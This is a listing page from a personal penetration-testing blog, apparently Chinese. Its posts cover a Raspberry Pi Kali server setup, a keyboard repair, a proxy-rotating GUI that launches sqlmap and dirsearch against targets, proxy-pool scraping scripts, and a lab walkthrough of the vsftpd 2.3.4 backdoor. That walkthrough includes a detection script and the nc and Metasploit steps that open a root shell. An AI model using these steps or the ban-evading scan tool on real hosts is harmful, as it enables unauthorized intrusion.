首页
月影的wiki
搜索
1
2023HW漏洞POC、EXP补充
719 阅读
2
海康威视常见漏洞收集
568 阅读
3
Cobalt Strike 插件CSx3Ldr, 一键生成免杀木马
422 阅读
4
代码审计分析工具 Fortify-2023
295 阅读
5
windows域控常见打法
271 阅读
渗透测试
代码脚本
工具
备忘录
业余爱好
闲话
系统应急
梅花易数
小六壬
漏洞
登录
Search
月影
累计撰写
85
篇文章
累计收到
101
条评论
首页
栏目
渗透测试
代码脚本
工具
备忘录
业余爱好
闲话
系统应急
梅花易数
小六壬
漏洞
页面
月影的wiki
搜索到
85
篇与
的结果
2022-06-24
树莓派kali系统安装宝塔搭建环境排雷
宝塔一键安装安装之前一定要清空系统环境,如果使用的kali img镜像直接烧录使用的系统,一般都是自带环境的,必须要先卸载干净php、mysql、nginx、apache等环境,在进行安装宝塔面板wget -O install.sh http://download.bt.cn/install/install-ubuntu.sh && sudo bash install.sh一般来说安装是不会出现报错的,如果发生报错请移步www.bt.cn论坛发帖咨询,很快会有工作人员为你解答,但一般都会劝你换系统。。。。mysql错误排查宝塔安装好后,我这里直接一键安装lnmp环境,nginx、ftp和phpmyadmin安装成功,mysql和php没有显示,查看安装日志,首先重装一遍mysql,然后输入以下指令cat /tmp/panelExec.log安装到78突然就断片了从来没碰到过这样的问题,按理来说不应该出现这种情况,因为我之前用树莓派装过宝塔,搭过环境,因为tf卡满了,换了个大容量的卡,重装遍除了kali版本不同,其他也没什么值得怀疑的点。在连续几天的排查以后,我终于找到了问题所在,原因是内存不足,导致c++被kill了,只要增加swap交换分区就可以解决问题我一开始没往这方面想,怎么说我的树莓派也是4G的内存,安装个环境绰绰有余的吧,没想到加了8G swap分区立马就安装成功了添加swap分区添加swap分区的方法如下:如果没分过swap分区的话,下面应该是0或者没有,我这里已经分好了。1.先创建一个交换文件存放的目录。我在根目录下创建名叫swap的目录mkdir /swap然后进入目录cd /swap创建自己希望的交换分区文件的大小需要注意dd命令消耗CPU性能较多,影响2分钟左右,如果生产环境,建议业务低谷操作。sudo dd if=/dev/zero of=swapfile bs=1M count=2k(创建2G的swap, 这步比较慢 创建分区的大小就= bs count,我是直接上了24,反正新换的tf卡容量够大)成功后会有提示,这时候查看swap文件夹下会多一个交换文件(swapfile),文件名字你可以自己定义在上面创建命令里。然后输入命令 mkswap swapfile挂载交换分区:swapon swapfile如果想卸载的话输入:swapoff swapfile 卸载后可以删除这个文件,然后重新根据你新的需要创建和调整交换文件大小6.最后可以查看空间大小:free -hswap项后面的大小就是你设定交换文件的大小如果不为0就说明挂载成功了。自动挂在交换文件(交换分区)sudo gedit /etc/fstab 在最后添加/swap/swapfile swap swap defaults 0 0问题完美解决,然而当我继续安装php7.2的时候,再次出现了问题,如下这下我彻底麻了,发帖去bt问,结果一句kali没测过换系统,我心态再次一崩。我尝试安装了7.0居然成功了,但是我原来的网站用的是php7.2,换了7.0直接给我报错,没办法到最后也没搞明白为啥php7.2安装不上,由于php7.0问题比较多,后来我干脆换了php7.4,重新找了个主题重新开始
2022年06月24日
29 阅读
0 评论
0 点赞
2022-05-30
雷柏机械键盘换轴
今天敲代码敲的正起劲的时候,突然发现键盘a键失灵了,这把雷柏v500pro 茶轴键盘从我大学入学开始就跟随我南征北战,如今居然说不行就不行了?看来我这个垃圾佬是时候露一手了 ::(你懂的) 。测试用在线按键测试测试了下所有的按键,确定只有a键阵亡了,那简单,我们只要简简单单换个轴就解决了,如果是一连串的按键失灵那可能是pcb板的某一条走线出现短路,那就比较麻烦,需要万用表测连通,然后刮板飞线乱七八糟的.....清理正好键盘也脏的不行,先把所有的键帽拆下,清理一下。观众老爷先吃 ::(真棒) 几年没清理过而已,没想到会这么下饭给键帽丢脸盆里泡着,先去整键盘拆解然后拆除所有的螺丝,拆完之后发现右上角卡着取不下来,百度了下才发现在键盘右上角logo底下居然还有一个螺丝,真阴险啊,还好没有大力出奇迹。吹风机加热,将logo取下,拆下底壳后,反过来就是pvb板。简单看一圈,pcb板无异常,各主控插件也都没有损坏焊点圆润饱满,没有虚焊,确定是轴的寿命到了,让他光荣退役,selu!!!全家福焊接作为一个垃圾佬,家里有几个轴这很正常吧电烙铁加热融化焊点,用大蓝棒把锡吸掉换上我的小红轴,手感还不赖(别问我为什么不上茶轴,因为我没有 ? )颜值也挺高复测在线按键测试,看下轴是否焊接正常键帽在晾,先上我的远古老键盘顶一阵子先,一定要确认键帽晾干才能上到轴上,不然到时候轴进水,失灵的可不是一个两个。
2022年05月30日
27 阅读
0 评论
0 点赞
2022-05-26
一键化使用代理ip去运行扫描脚本
每次使用扫描工具例如sqlmap、dirsearch、xray这些脚本都需要输入一大串代码,于是简单梳理了需求如下:1、可视化界面2、一键化操作3、随机抽取代理配合扫描代码如下:import os import tkinter as tk import random import pyperclip import re # 调用已拉取保存好的代理保存到对应的列表中备用 http_open = open('D:/pycharm/project/代理/new/proxy_http.txt') https_open = open('D:/pycharm/project/代理/new/proxy_https.txt') http_pro = http_open.read().splitlines() https_pro = https_open.read().splitlines() http_proxy = [] https_proxy = [] for i in http_pro: http_proxy.append(i) for j in https_pro: https_proxy.append(j) # 正则判断开头是否为https line_new2 = re.compile('^https://') # 清除targeturl中的内容 def del_clear(): entry_target_url.delete(0, 'end') # 诗句 def shi(): list = ['挟取笔端风雨,快写胸中丘壑,不肯下樊笼。\n大笑了今古,乘兴便西东。\n——张元干《水调歌头·赠汪秀才》', '抬眸四顾乾坤阔,日月星辰任我攀。\n——苏轼《失题》', '笔底烟云飞走,胸次乾坤吐纳,议论总纵横。\n——京镗《水调歌头·次卢漕韵呈茶漕二使》', '黄河落天走东海,万里写入胸怀间。\n——李白《赠裴十四》', '孰知不向边庭苦,纵死犹闻侠骨香。\n——王维《杂曲歌辞·少年行四首》', '自信人生二百年,会当水击三千里。\n——毛泽东《七古·残句》', '他日卧龙终得雨,今朝放鹤且冲天。\n——刘禹锡《刑部白侍郎谢病长告...》', '我欲穿花寻路,直入白云深处,浩气展虹霓。\n——黄庭坚《水调歌头·游览》', '出门一笑,月落江横,数峰天远。\n——张炎《烛影摇红·隔窗闻歌》', '一剑横空星斗寒,甫随平北复征蛮。\n——戚继光《题武夷》', '问近来,铛脚许何人,吾其一。\n——赵磻老《满江红·用前韵》', '三峡江声流笔底,六朝帆影落樽前。\n——米芾《望海楼》', '岂堪久蔽苍苍色,须放三光照九州。\n——杜荀鹤《山中对雪有作》', '好借食间前箸,尽吐胸中奇计,指顾静烟尘。\n——曾协《水调歌头·送史侍郎》', '十步杀一人,千里不留行。\n事了拂衣去,深藏身与名。\n——李白《杂曲歌辞·侠客行》'] daying = random.choice(list) var_input.set(daying) # 打开dirsearch目录 def open_dirsearch(): os.startfile("F:/工具/dirsearch-master/dirsearch-master") # 运行dirsearch并使用代理 def run_dirsearch(): url_dir = entry_target_url.get() if not line_new2.match(url_dir): proxy_url = random.choice(http_proxy) print(proxy_url) os.system( f"python F:/工具/dirsearch-master/dirsearch-master/dirsearch.py -u {url_dir} --proxy {proxy_url} -x 400-599") else: proxy_url = random.choice(https_proxy) print(proxy_url) os.system( f"python F:/工具/dirsearch-master/dirsearch-master/dirsearch.py -u {url_dir} --proxy {proxy_url} -x 400-599") # 打开sqlmap目录 def open_sqlmap(): os.startfile("E:/下载/sqlmap/sqlmap") # 运行sqlmap并使用代理 def run_sqlmap(): url_dir = entry_target_url.get() if not line_new2.match(url_dir): proxy_url = random.choice(http_proxy) print(proxy_url) os.system(f"python E:/下载/sqlmap/sqlmap/sqlmap.py -u {url_dir} -proxy={proxy_url} --level 3 --risk 2") else: proxy_url = random.choice(https_proxy) print(proxy_url) os.system(f"python E:/下载/sqlmap/sqlmap/sqlmap.py -u {url_dir} -proxy={proxy_url} --level 3 --risk 2") # 获取剪贴板中的内容写入1.txt,以1.txt文件运行sqlmap并使用代理 def run_zhuabao(): dd = pyperclip.paste() dd = dd.replace("\r", "") with open('E:/下载/sqlmap/sqlmap/1.txt', 'w') as sql_file: sql_file.write(dd) proxy_url = random.choice(http_proxy) os.system( f"python E:/下载/sqlmap/sqlmap/sqlmap.py -r E:/下载/sqlmap/sqlmap/1.txt -proxy={proxy_url} --level 3 --risk 2 --batch") # 画布大小 window = tk.Tk() window.title('Welcome to fofa') window.geometry('600x400') mulu = os.getcwd() # 设置窗口显示的字 tk.Label(window, text='大家好,这里是辅助代理测试脚本').place(x=225, y=25) tk.Label(window, text='请输入目标url').place(x=265, y=65) tk.Label(window, text='目标地址: ').place(x=50, y=100) tk.Label(window, text='请选择您想要执行的脚本').place(x=240, y=145) # 定义两个文本框的默认值 target_url = tk.StringVar() target_url.set('www.baidu.com') entry_target_url = tk.Entry(window, textvariable=target_url) entry_target_url.place(x=120, y=100) entry_target_url.place(width=430, height=30) # 调试窗口 var_input = tk.StringVar() # 打印诗句 shi() # var_input.set('这里是调试窗口') w = tk.Label(window, textvariable=var_input, # 标签的文字 bg='black', # 背景颜色 fg='green', # 字体颜色 font=('Arial', 12), # 字体和字体大小 width=200, height=8) # 标签长宽 w.pack(side='bottom') # 固定窗口位置 # 按钮 btn_dir = tk.Button(window, text='dirsearch', command=run_dirsearch) btn_dir.place(x=100, y=180) btn_dir_open = tk.Button(window, text='open file', command=open_dirsearch) btn_dir_open.place(x=100, y=215) btn_sql_run = tk.Button(window, text='sqlmap', command=run_sqlmap) btn_sql_run.place(x=250, y=180) btn_sql_open = tk.Button(window, text='open file', command=open_sqlmap) btn_sql_open.place(x=245, y=215) btn_sql_run = tk.Button(window, text='sql to txt', command=run_zhuabao) btn_sql_run.place(x=350, y=195) btn_clear = tk.Button(window, text='清除', command=del_clear) btn_clear.place(x=470, y=195) window.mainloop() 运行效果如下,cmd窗口运行期间,gui窗口是卡死无法操作的状态,这个问题我后期再想办法解决吧。
2022年05月26日
17 阅读
0 评论
0 点赞
2022-05-26
免费代理池项目,含使用脚本
在实际渗透测试工作中经常会被动不动封ip,很影响工作效率,于是我便在自家服务器上搭建了一个免费代理池项目:https://github.com/jhao104/proxy_pool/,搭建过程不多说了,详情请见下面链接的搭建过程,这篇主要讲下利用。搭建教程:https://blog.csdn.net/wjwqp/article/details/124014484搭建完成后,访问网页服务器ip:5010,会看到一些json数据,访问/get可以获得一个随机的代理ip,访问/all可以看到所有代理ip,/count看到代理的总数,/delete删除代理说实话,我一开始没搞明白这个代理池的功能,也不知道代理的数量是固定的,甚至不知道/all可以显示所有的代理,以为是实时随机对那些免费代理去进行爬取,结果就搞出了一个乌龙,我甚至还去写了个异步爬取脚本对/get的内容去进行批量爬取一万条,最后发现好像去重以后就五十几条代理,代码如下,看个乐。import asyncio import aiohttp import time import os start = time.time() if not os.path.exists('proxy.txt'): f = open('proxy.txt', 'a') else: os.remove('proxy.txt') f = open('proxy.txt', 'a') proxy_ip = [] list_ip = [] async def request(session): resp = await session.get('http://192.168.31.143:5010/get', timeout=8) result = await resp.json() ip = result['proxy'] print(ip) if ip in proxy_ip: pass else: proxy_ip.append(ip) async def main(): async with aiohttp.ClientSession() as session: task_list = [] shu = 0 while shu < int(jishu): req = request(session) task = asyncio.create_task(req) task_list.append(task) shu += 1 await asyncio.gather(*task_list) end = time.time() if __name__ == '__main__': jishu = input("请输入要爬取的代理数量(注意输入的数值会乘10,如果想爬取1000个请输入100,建议50,免费的代理大多重复):") for i in range(10): asyncio.run(main()) print(f"去重完毕,还有{len(proxy_ip)}个地址,开始写入文件") for j in proxy_ip: f.write(j + '\n') print(f"写入完毕!!!\n总耗时:{round(time.time() - start,2)}秒") f.close() 用了一段时间才发现原来翻来覆去还是那几个代理,然后去详细看了下代理池的介绍才发现/all这个参数可以显示所有的代理。于是幡然醒悟的我又编写了新的脚本来读取所有代理import requests import os import random # 检测proxy_http.txt是否存在,如果存在删除重新创建一个 if not os.path.exists('proxy_http.txt'): f = open('proxy_http.txt', 'a') else: os.remove('proxy_http.txt') f = open('proxy_http.txt', 'a') # 检测proxy_https.txt是否存在,如果存在删除重新创建一个 if not os.path.exists('proxy_https.txt'): f1 = open('proxy_https.txt', 'a') else: os.remove('proxy_https.txt') f1 = open('proxy_https.txt', 'a') # 请求服务器爬取所有代理ip def request(): url = "http://192.168.31.143:5010/all/" response = requests.get(url=url) response_text = response.json() for i in response_text: ip = i['proxy'] http_true = i['https'] if str(http_true) == 'True': ip = f'https://{ip}' globals()['https_num'] += 1 f1.write(ip + '\n') else: ip = f'http://{ip}' globals()['http_num'] += 1 f.write(ip + '\n') if __name__ == '__main__': list = ['挟取笔端风雨,快写胸中丘壑,不肯下樊笼。\n大笑了今古,乘兴便西东。\n——张元干《水调歌头·赠汪秀才》', '抬眸四顾乾坤阔,日月星辰任我攀。\n——苏轼《失题》', '笔底烟云飞走,胸次乾坤吐纳,议论总纵横。\n——京镗《水调歌头·次卢漕韵呈茶漕二使》', '黄河落天走东海,万里写入胸怀间。\n——李白《赠裴十四》', '孰知不向边庭苦,纵死犹闻侠骨香。\n——王维《杂曲歌辞·少年行四首》', '自信人生二百年,会当水击三千里。\n——毛泽东《七古·残句》', '他日卧龙终得雨,今朝放鹤且冲天。\n——刘禹锡《刑部白侍郎谢病长告...》', '我欲穿花寻路,直入白云深处,浩气展虹霓。\n——黄庭坚《水调歌头·游览》', '出门一笑,月落江横,数峰天远。\n——张炎《烛影摇红·隔窗闻歌》', '一剑横空星斗寒,甫随平北复征蛮。\n——戚继光《题武夷》', '问近来,铛脚许何人,吾其一。\n——赵磻老《满江红·用前韵》', '三峡江声流笔底,六朝帆影落樽前。\n——米芾《望海楼》', '岂堪久蔽苍苍色,须放三光照九州。\n——杜荀鹤《山中对雪有作》', '好借食间前箸,尽吐胸中奇计,指顾静烟尘。\n——曾协《水调歌头·送史侍郎》', '十步杀一人,千里不留行。\n事了拂衣去,深藏身与名。\n——李白《杂曲歌辞·侠客行》'] daying = random.choice(list) print('\n' + daying + '\n') print('开始爬取代理!!!') http_num = 0 https_num = 0 request() f.close() f1.close() print(f'爬取结束,http协议的代理有{http_num}个,https协议的代理有{https_num}个')这个事情告诉我们借用别人的项目一定要看清使用文档啊行,这篇先写到这里,下个文章写下利用爬取到的代理去跑脚本
2022年05月26日
22 阅读
1 评论
0 点赞
2022-05-21
python脚本检测目标ip是否存在ftp笑脸漏洞(ftp后门漏洞)
vsftpd2.3.4中在6200端口存在一个shell,使得任何人都可以进行连接,并且VSFTPD v2.3.4 服务,是以 root 权限运行的,最终我们提到的权限也是root;当连接带有vsftpd 2.3.4版本的服务器的21端口时,输入用户中带有“:) ”,密码任意,因此也称为笑脸漏洞。 环境搭建 攻击机(本机):192.168.1.3靶机(metaspolit2):192.168.1.5nmap进行漏洞检测python脚本进行漏洞检测 代码如下: import socket from ftplib import FTP url = input("请输入你需要检测的地址:") ftp = FTP() username = 'root:)' #用户名必须包含:)这两个字符 password = 'anonymous' #密码随便啥都行 try: ftp.connect(url,21,timeout=10)#使用ftp登录,设置延时10秒 ftp.login(username,password) ftp.quit() except: print("完成登录检测") try: s = socket.socket() #使用socket函数来检测是否有漏洞存在 s.connect((url,6200)) s.close() print("存在微笑漏洞") excep t: print("没有发现笑脸漏洞!")(一)使用nc进行漏洞利用1、打开命令行登录ftp服务器,在用户名处输入xiaofeng:)然后随意输入一个密码回车等待,紧接着进行下一步:2、打开一个新窗口,输入nc 目标ip 6200 即可连接。(二)使用msf进行漏洞利用打开MSFConsole搜索vsftpd_234并使用设置攻击目标,进行exploit即可获取shell。
2022年05月21日
12 阅读
2 评论
0 点赞
1
...
16
17